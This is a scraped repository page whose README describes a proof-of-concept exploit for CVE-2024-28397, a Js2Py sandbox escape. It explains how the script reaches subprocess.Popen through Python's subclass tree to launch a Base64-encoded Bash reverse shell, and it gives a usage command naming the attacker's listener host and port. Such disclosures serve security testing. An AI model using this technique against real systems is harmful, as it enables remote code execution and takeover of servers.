来源

关联漏洞

描述

This repository contains a Proof of Concept (PoC) for CVE-2024-28397, a vulnerability in the js2py library allowing a sandbox escape to achieve remote code execution.

介绍

# CVE-2024-28397-Js2Py-RCE
📌 **Description**

This repository contains a Python-based Proof of Concept (PoC) for CVE-2024-28397, a sandbox escape vulnerability in the Js2Py JavaScript interpreter for Python.
When the target application evaluates untrusted JS code via Js2Py, an attacker can break out of the sandbox and execute arbitrary Python code. This can be leveraged to gain remote code execution (RCE) and a reverse shell on the vulnerable system.

This exploit was inspired by Marven11’s [CVE-2024-28397-js2py-Sandbox-Escape](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape) project.

---

⚠️ **Disclaimer**

This script is provided for educational and authorized penetration testing purposes only. Unauthorized use of this script against systems you do not own or have explicit permission to test is illegal and unethical. The author assumes no responsibility for misuse or damage caused by this script.

---

🧠 **About the Vulnerability**
- CVE ID: [CVE-2024-28397](https://nvd.nist.gov/vuln/detail/CVE-2024-28397)
- Component: Js2Py sandbox escape
- Impact: Unrestricted access to Python’s object model via `__class__.__base__.__subclasses__`, leading to arbitrary code execution
- Attack Vector: Remote (via exposed HTTP interface evaluating user-controlled JavaScript)

---

🚀 **Features**
- Automatic reverse shell payload delivery via Python RCE
- Inline Base64-encoded shell command execution
- Built-in reverse shell listener with basic PTY stabilization
- Clean output formatting
- Lightweight and dependency-free (except for requests)

---

🔧 **Requirements**
- Python 3.x
- `requests` module (`pip install requests`)
- A Linux system (for `/dev/tcp` reverse shell)
- A target running a vulnerable implementation of Js2Py

---

📦 **Usage**
```
python3 exploit.py --target http://example.htb --lhost 10.10.14.51 --lport 4444
```
- `--target`: The full URL to the vulnerable web app endpoint
- `--lhost`: Your local IP address (used for reverse shell)
- `--lport`: Your local port to receive the shell

---

🛠️ **How It Works**
1. The script prepares a Bash reverse shell, Base64-encodes it, and injects it into a JavaScript payload.
2. The JS payload walks the Python object tree using `__class__.__base__.__subclasses__()` to find `subprocess.Popen`.
3. It uses `Popen` to decode and execute the shell.
4. The attacker’s machine receives the reverse shell and automatically stabilizes it.

文件快照

 [4.0K]  /data/pocs/cde797a416267fc9b08fdd6e18ef3a1112a9c4be
├── [4.2K]  exploit.py
└── [2.4K]  README.md

0 directories, 2 files

备注